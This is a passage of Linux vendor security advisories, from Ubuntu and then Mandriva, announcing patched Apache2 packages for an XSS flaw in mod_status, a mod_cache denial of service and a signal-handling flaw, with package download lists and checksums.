Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: apache2-common 2.0.55-4ubuntu2.2 apache2-mpm-prefork 2.0.55-4ubuntu2.2 apache2-mpm-worker 2.0.55-4ubuntu2.2 Ubuntu 6.10: apache2-common 2.0.55-4ubuntu4.1 apache2-mpm-prefork 2.0.55-4ubuntu4.1 apache2-mpm-worker 2.0.55-4ubuntu4.1 Ubuntu 7.04: apache2-mpm-prefork 2.2.3-3.2ubuntu0.1 apache2-mpm-worker 2.2.3-3.2ubuntu0.1 apache2.2-common 2.2.3-3.2ubuntu0.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Stefan Esser discovered that mod_status did not force a character set, which could result in browsers becoming vulnerable to XSS attacks when processing the output. If a user were tricked into viewing server status output during a crafted server request, a remote attacker could exploit this to modify the contents, or steal confidential data (such as passwords), within the same domain. By default, mod_status is disabled in Ubuntu. (CVE-2006-5752) Niklas Edmundsson discovered that the mod_cache module could be made to crash using a specially crafted request. A remote user could use this to cause a denial of service if Apache was configured to use a threaded worker. By default, mod_cache is disabled in Ubuntu. (CVE-2007-1863) A flaw was discovered in the signal handling of Apache. A local attacker could trick Apache into sending SIGUSR1 to other processes. The vulnerable code was only present in Ubuntu Feisty. (CVE-2007-3304) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.2.diff.gz Size/MD5: 115882 e94e45574e3b131d3a9a0e07e193f1e5 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.2.dsc Size/MD5: 1148 c2bc143625fbf8ca59fea300845c5a42 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55.orig.tar.gz Size/MD5: 6092031 45e32c9432a8e3cf4227f5af91b03622 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.0.55-4ubuntu2.2_all.deb Size/MD5: 2124364 9b8ca5d5757c63f5ee6bbd507f0a8357 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.2_amd64.deb Size/MD5: 833000 be4c7770c725f5f4401ca06d1347211f http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.2_amd64.deb Size/MD5: 227832 41c12dfe84f109e6544a33e4e1d791a8 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.2_amd64.deb Size/MD5: 222934 7e4d072bad27239e366a6eda94c09190 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.2_amd64.deb Size/MD5: 227576 8fc59f78a3fa0e5d6dac81e875039bda http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.2_amd64.deb Size/MD5: 171082 4318f93373b705563251f377ed398614 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.2_amd64.deb Size/MD5: 171860 257f4183d70be5a00546c39c5a18f108 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.2_amd64.deb Size/MD5: 93916 695cee55f91ceb9424abe31d8b6ee1dd http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.2_amd64.deb Size/MD5: 35902 00c1082a77ff1d863f72874c4472a26d http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.2_amd64.deb Size/MD5: 285336 0a8510634b21f56f0d9619aa6fc9cec9 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.2_amd64.deb Size/MD5: 143952 d75f83ac219bce95a15a8f44b82b8ea7 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.2_i386.deb Size/MD5: 786186 4e78fa0d438867194f66b11b4eb6fc2e http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.2_i386.deb Size/MD5: 202448 74cf60884e18c1fc93f157010a15b12c http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.2_i386.deb Size/MD5: 198456 209a0b92995fec453ed4c2c181e3e555 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.2_i386.deb Size/MD5: 202038 6cbd437caf993fa2b2b38369cd3d5863 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.2_i386.deb Size/MD5: 171074 0a5a26aa58af7aa2d51d1cf5d7c543d6 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.2_i386.deb Size/MD5: 171848 af9ca78febc5bc0c7936296dab958349 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.2_i386.deb Size/MD5: 91884 2857d60b507b28c736f83815c9f3d1b8 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.2_i386.deb Size/MD5: 35906 202b5b233af0d26e29ca7302cf7fd04c http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.2_i386.deb Size/MD5: 261418 c90342706ac26682d15032a5ba5cb51a http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.2_i386.deb Size/MD5: 131850 951a4573901bc2f10d5febf940d57516 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.2_powerpc.deb Size/MD5: 859126 afdd8642ca447fc9dc70dfed92be0fa6 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.2_powerpc.deb Size/MD5: 219898 6d9c9f924d2356bf9d3438a280870a7d http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.2_powerpc.deb Size/MD5: 215602 dd554132cdea0f860e01cf5d4e0dbc7c http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.2_powerpc.deb Size/MD5: 219378 7a1f4b325dacef287c901fa66680c04e http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.2_powerpc.deb Size/MD5: 171096 a0e2547d38ef1b84dc419d69e42ffa0b http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.2_powerpc.deb Size/MD5: 171864 200ab662b2c13786658486df37fda881 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.2_powerpc.deb Size/MD5: 103628 ae36642fbd4698bb362fa4bf9417b0e3 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.2_powerpc.deb Size/MD5: 35910 358027282f2f19451d3aa784dc0474dc http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.2_powerpc.deb Size/MD5: 280950 0d9b56ec076da25e2a03f6d3c6445057 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.2_powerpc.deb Size/MD5: 141074 f5d3d5e0e5911e0c0156ae55af50f87b sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.2_sparc.deb Size/MD5: 803440 d66da6a91c08956c3c5062668349ef41 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.2_sparc.deb Size/MD5: 209970 57f0a8f823a4502ee9a2608e3181cc81 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.2_sparc.deb Size/MD5: 205582 1dcfb0df796e85c409f614544ea589fe http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.2_sparc.deb Size/MD5: 209330 6bf7ae824eea35d3487febef384fce91 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.2_sparc.deb Size/MD5: 171080 1088337f4abcb6c8f65751b6120c2307 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.2_sparc.deb Size/MD5: 171868 5cda04cd73a9c6d8dfc18abd55c09ebd http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.2_sparc.deb Size/MD5: 92972 850ab3bb0904e8fe9b6255c42ba7f84c http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.2_sparc.deb Size/MD5: 35904 7af260b95c4faa17ef34810fed888caf http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.2_sparc.deb Size/MD5: 267550 08182a8a2cab00fc0e6bca2cccf5165f http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.2_sparc.deb Size/MD5: 129760 a60606c6d2f12209b0bdae997be4a13f Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu4.1.diff.gz Size/MD5: 116265 2732761b18dfb3c2cd1aa0b54c2cf623 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu4.1.dsc Size/MD5: 1148 4b9c4612469c521db0c5fdbe2f6b9b25 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55.orig.tar.gz Size/MD5: 6092031 45e32c9432a8e3cf4227f5af91b03622 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.0.55-4ubuntu4.1_all.deb Size/MD5: 2124550 8d5c30342b35f9fd595fb09d7659b6fc amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu4.1_amd64.deb Size/MD5: 836342 2c4ba483b0b20fdc2d43819109177941 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu4.1_amd64.deb Size/MD5: 227390 e61cc1998f5b8f2c44dce587e59d288a http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu4.1_amd64.deb Size/MD5: 222376 6bdbff7f7f80fd464d1e3ec52d6e7171 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu4.1_amd64.deb Size/MD5: 226848 4356b4caf2b40f364c8893c41b9f9355 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu4.1_amd64.deb Size/MD5: 171304 c4395af051e876228541ef5b8037d979 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu4.1_amd64.deb Size/MD5: 172074 99dadc4ad0f0947f9368d89f4589d95a http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu4.1_amd64.deb Size/MD5: 94204 30f3bb8c72575fe93940ecc730b8e4b6 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu4.1_amd64.deb Size/MD5: 36152 ea3cbefcbee7e2f6e5555edb44733ad9 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu4.1_amd64.deb Size/MD5: 286544 d555931490d44d93bec31c4bfc19ed12 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu4.1_amd64.deb Size/MD5: 145014 3e06ceb0a55598d82f9f781c44e210b3 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu4.1_i386.deb Size/MD5: 806938 050bb7665332d3761e1a8e47939fa507 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu4.1_i386.deb Size/MD5: 209556 ee530b24aba8838001ebb6c901bc90cd http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu4.1_i386.deb Size/MD5: 205718 b52a17c63909eae3c49bad0ab1958f4b http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu4.1_i386.deb Size/MD5: 209158 1844fa5e09224a90944f8b886ddb5a2a http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu4.1_i386.deb Size/MD5: 171296 9de8aba41f7e3d60f41536ca712adebb http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu4.1_i386.deb Size/MD5: 172078 01ccd554177364747b08e2933f121d2c http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu4.1_i386.deb Size/MD5: 93240 4573597317416869646eb2ea42cd0945 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu4.1_i386.deb Size/MD5: 36150 77666d65bade6a91bd58826c79f11dc9 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu4.1_i386.deb Size/MD5: 266390 a3963d8e76f6865404f7fadb47880c87 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu4.1_i386.deb Size/MD5: 137604 387f6bcdaa58dbbe53082241b3231844 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu4.1_powerpc.deb Size/MD5: 865372 27d7f1de1fcb2114d3f3b0a774302488 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu4.1_powerpc.deb Size/MD5: 221542 1ae8fa5cf4b77f3b2aa054e2886e587e http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu4.1_powerpc.deb Size/MD5: 217044 9134983c40107f79fcac8d1eacbc7117 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu4.1_powerpc.deb Size/MD5: 221324 b435dc09c63ecbcd564a0923a8f07350 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu4.1_powerpc.deb Size/MD5: 171296 6d2a0abfb7a1daaeae56559eeb322dcb http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu4.1_powerpc.deb Size/MD5: 172064 ecc2037409554ea43c5a6848aa510c76 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu4.1_powerpc.deb Size/MD5: 104654 d0957d8df044c4a34437241792ed97d1 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu4.1_powerpc.deb Size/MD5: 36148 34e102e1d2e1c6a6f31801dfb98cb82a http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu4.1_powerpc.deb Size/MD5: 284548 c8f325ccc42cbe77191d4ddd9abc2a4e http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu4.1_powerpc.deb Size/MD5: 144238 82cfbfcec5fc4931078145af8947c035 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu4.1_sparc.deb Size/MD5: 811594 d8548e537fd81994bbb638e105dfbf8b http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu4.1_sparc.deb Size/MD5: 212160 81cd0197ff89b79c967c1074ede9f8d7 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu4.1_sparc.deb Size/MD5: 207870 5d80ed8dc39b0d4d59fccb747624a684 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu4.1_sparc.deb Size/MD5: 211578 9407383d85db831dab728b39cce9acc8 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu4.1_sparc.deb Size/MD5: 171294 5e4d695a99bdc1fdfb0bfcef8b91d03d http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu4.1_sparc.deb Size/MD5: 172064 06e3e765d799e281dba7329ff9d9e138 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu4.1_sparc.deb Size/MD5: 93796 1048b47b289fb2047fa9ac7ebbe94a57 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu4.1_sparc.deb Size/MD5: 36150 0d106a177aa4271b1cfc0e96eec1a748 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu4.1_sparc.deb Size/MD5: 268444 3912123e7c71cc638132305ca89fe23b http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu4.1_sparc.deb Size/MD5: 130626 f4444e0239c2da7d3c31e3486606f95a Updated packages for Ubuntu 7.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.3-3.2ubuntu0.1.diff.gz Size/MD5: 112120 f7b1a17718aed7ca73da3a6d7aad06b0 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.3-3.2ubuntu0.1.dsc Size/MD5: 1128 e82b1bee591fff50d6673ed1a443e543 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.3.orig.tar.gz Size/MD5: 6342475 f72ffb176e2dc7b322be16508c09f63c Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.2.3-3.2ubuntu0.1_all.deb Size/MD5: 2199184 c03756f87cb164213428532f70e0c198 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.2.3-3.2ubuntu0.1_all.deb Size/MD5: 272064 5be351f491f8d1aae9a270d1214e93e3 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-src_2.2.3-3.2ubuntu0.1_all.deb Size/MD5: 6674104 bdbabf8f478562f0e003737e977ffc7b http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.3-3.2ubuntu0.1_all.deb Size/MD5: 38668 9f0c7c01e8441285c084002eb4619065 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.3-3.2ubuntu0.1_amd64.deb Size/MD5: 449624 1b54a8000c40eaaa0f9e31527b9bb180 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.3-3.2ubuntu0.1_amd64.deb Size/MD5: 445346 d15625641a3247fbf5d9d9b9aed34968 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.3-3.2ubuntu0.1_amd64.deb Size/MD5: 449208 55f39c28a4de98d53f80231aeb7d6c59 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.3-3.2ubuntu0.1_amd64.deb Size/MD5: 403570 0042c75be8a2d128d62b79398deaefa8 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.3-3.2ubuntu0.1_amd64.deb Size/MD5: 404138 929772b95ea67f338ad423a65b2b7011 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.3-3.2ubuntu0.1_amd64.deb Size/MD5: 341312 906819b0de863209575aa65d39a594a5 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.3-3.2ubuntu0.1_amd64.deb Size/MD5: 971462 f85e32c5f6437ce149553aee97ffd934 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.3-3.2ubuntu0.1_i386.deb Size/MD5: 432922 c1b81ac7dc7b7a0b2261fd10d9bcf5c6 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.3-3.2ubuntu0.1_i386.deb Size/MD5: 428856 f506f2a9dd2dbd5c2d3f72a476cc3537 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.3-3.2ubuntu0.1_i386.deb Size/MD5: 432314 a5a11947ad8cf14604efa7ddcfd20bfe http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.3-3.2ubuntu0.1_i386.deb Size/MD5: 403574 da84a3a99276f14a11ac892ce7eee170 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.3-3.2ubuntu0.1_i386.deb Size/MD5: 404138 0fdd43a53e6957aa3a348a7bd9c876f5 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.3-3.2ubuntu0.1_i386.deb Size/MD5: 340396 88a0ddbc58335416d91c9f10adc9d5f5 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.3-3.2ubuntu0.1_i386.deb Size/MD5: 929716 138d58487b882e6002e3c5e4a9489add powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.3-3.2ubuntu0.1_powerpc.deb Size/MD5: 451530 ddc437092ef642fcd396713cd1972f4c http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.3-3.2ubuntu0.1_powerpc.deb Size/MD5: 446960 af1b667708e062f81bca4e995355394d http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.3-3.2ubuntu0.1_powerpc.deb Size/MD5: 450940 ed9f31ec5045a88446115987c6e97655 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.3-3.2ubuntu0.1_powerpc.deb Size/MD5: 403574 65801ab51335a15dc370b9341a0e50dd http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.3-3.2ubuntu0.1_powerpc.deb Size/MD5: 404146 fd35e65fadd836feb0190b209947b466 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.3-3.2ubuntu0.1_powerpc.deb Size/MD5: 360518 b74bc9eead429cd8f0ebecd6a94e5edb http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.3-3.2ubuntu0.1_powerpc.deb Size/MD5: 1073812 376fe5b1ee383a6d870eea5dd3c6a704 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.3-3.2ubuntu0.1_sparc.deb Size/MD5: 434408 c70ef2e9aed191fe53886ceb3725596e http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.3-3.2ubuntu0.1_sparc.deb Size/MD5: 430574 7b690896da23a151ee5e106d596c1143 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.3-3.2ubuntu0.1_sparc.deb Size/MD5: 433918 cc01edfcfc673ba9a86c83fcc66e6870 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.3-3.2ubuntu0.1_sparc.deb Size/MD5: 403568 a7660cff70394403c764cf8f30c7298a http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.3-3.2ubuntu0.1_sparc.deb Size/MD5: 404136 b8587d5eba0be59a6576d6cf645b2122 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.3-3.2ubuntu0.1_sparc.deb Size/MD5: 343370 1572a001a612add57d23350210ac1736 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.3-3.2ubuntu0.1_sparc.deb Size/MD5: 938586 b74a91fcfbb0503355e94981310bd1ce

cache_util.c in the mod_cache module in Apache HTTP Server (httpd), when caching is enabled and a threaded Multi-Processing Module (MPM) is used, allows remote attackers to cause a denial of service (child processing handler crash) via a request with the (1) s-maxage, (2) max-age, (3) min-fresh, or (4) max-stale Cache-Control headers without a value. The Apache mod_cache module is prone to a denial-of-service vulnerability. A remote attacker may be able to exploit this issue to crash the child process. This could lead to denial-of-service conditions if the server is using a multithreaded Multi-Processing Module (MPM). This could lead to a denial of service if using a threaded MPM (CVE-2007-1863). A local attacker with the ability to run scripts on the server could manipulate the scoreboard and cause arbitrary processes to be terminated (CVE-2007-3304). Updated packages have been patched to prevent the above issues. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5752 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1863 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3304 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.0: 5f906bba3e1195f5ffbc3fcb2a6bde38 2007.0/i586/apache-base-2.2.3-1.1mdv2007.0.i586.rpm 83a4844cd98ef203958796ce280a71b2 2007.0/i586/apache-devel-2.2.3-1.1mdv2007.0.i586.rpm 2a6853cad61ca0548715486c5d4c8a23 2007.0/i586/apache-htcacheclean-2.2.3-1.1mdv2007.0.i586.rpm bebbc850c030be2ef87ce12d420fb825 2007.0/i586/apache-mod_authn_dbd-2.2.3-1.1mdv2007.0.i586.rpm 9e08e4738b304aab4f90f4f18aa5da45 2007.0/i586/apache-mod_cache-2.2.3-1.1mdv2007.0.i586.rpm 989d0538f7882277053f6d4c89ca581c 2007.0/i586/apache-mod_dav-2.2.3-1.1mdv2007.0.i586.rpm c1c0fc53dd811dd6176800226574efbf 2007.0/i586/apache-mod_dbd-2.2.3-1.1mdv2007.0.i586.rpm e68509c01d66b9d42e676e7974360154 2007.0/i586/apache-mod_deflate-2.2.3-1.1mdv2007.0.i586.rpm 5596cb5359b7919125fc10be83598445 2007.0/i586/apache-mod_disk_cache-2.2.3-1.1mdv2007.0.i586.rpm d71b54240667224fd7da7fec4693c30b 2007.0/i586/apache-mod_file_cache-2.2.3-1.1mdv2007.0.i586.rpm 3571cab041e622f9399c57f377ac3fe3 2007.0/i586/apache-mod_ldap-2.2.3-1.1mdv2007.0.i586.rpm 598fdd7aad80fdc557142c5e9fc00677 2007.0/i586/apache-mod_mem_cache-2.2.3-1.1mdv2007.0.i586.rpm f4ec774478f5d198ad2e3d3384a5ad83 2007.0/i586/apache-mod_proxy-2.2.3-1.1mdv2007.0.i586.rpm ab7726290be59f03a5ade2029a2b02f8 2007.0/i586/apache-mod_proxy_ajp-2.2.3-1.1mdv2007.0.i586.rpm d72ab4173d51da4a0c1df63dbb52ccf5 2007.0/i586/apache-mod_ssl-2.2.3-1.1mdv2007.0.i586.rpm fcde0ec8b64d83402b53f926ec7fa835 2007.0/i586/apache-mod_userdir-2.2.3-1.1mdv2007.0.i586.rpm 58a0628d42d23c9aa5df6567789fad40 2007.0/i586/apache-modules-2.2.3-1.1mdv2007.0.i586.rpm 011487e1afdfb400419303182e5320c7 2007.0/i586/apache-mpm-prefork-2.2.3-1.1mdv2007.0.i586.rpm 7a755b22020153b44f8d00ba153d3d97 2007.0/i586/apache-mpm-worker-2.2.3-1.1mdv2007.0.i586.rpm ef6e11f0d26db492bc9fe83a2dbf53d7 2007.0/i586/apache-source-2.2.3-1.1mdv2007.0.i586.rpm 411b90e42ed304f329e9989d64a9dfc5 2007.0/SRPMS/apache-2.2.3-1.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 7c5408879073413fb27f2d40854813d0 2007.0/x86_64/apache-base-2.2.3-1.1mdv2007.0.x86_64.rpm c720f2a661616b0bf35bc353d14b9b3b 2007.0/x86_64/apache-devel-2.2.3-1.1mdv2007.0.x86_64.rpm 12164d6d70972cb9ed2fb6581e212bf1 2007.0/x86_64/apache-htcacheclean-2.2.3-1.1mdv2007.0.x86_64.rpm 5278f8d03ce9d59ec4929d4362b04bbe 2007.0/x86_64/apache-mod_authn_dbd-2.2.3-1.1mdv2007.0.x86_64.rpm 40c83185db12d04f4953a374b329ebb3 2007.0/x86_64/apache-mod_cache-2.2.3-1.1mdv2007.0.x86_64.rpm fe37fb1d4378c4bbcfd8d63bd57c3d4d 2007.0/x86_64/apache-mod_dav-2.2.3-1.1mdv2007.0.x86_64.rpm 0830bc5d1718a533e3358a45975596ce 2007.0/x86_64/apache-mod_dbd-2.2.3-1.1mdv2007.0.x86_64.rpm e18c3a6a322258e73b87170766aa7882 2007.0/x86_64/apache-mod_deflate-2.2.3-1.1mdv2007.0.x86_64.rpm fc8c27067e6b04bd549fe0b95579ebaa 2007.0/x86_64/apache-mod_disk_cache-2.2.3-1.1mdv2007.0.x86_64.rpm b31385db2199fd33eeb624c80e9d882a 2007.0/x86_64/apache-mod_file_cache-2.2.3-1.1mdv2007.0.x86_64.rpm 08123786649152eab65e123c75db8e66 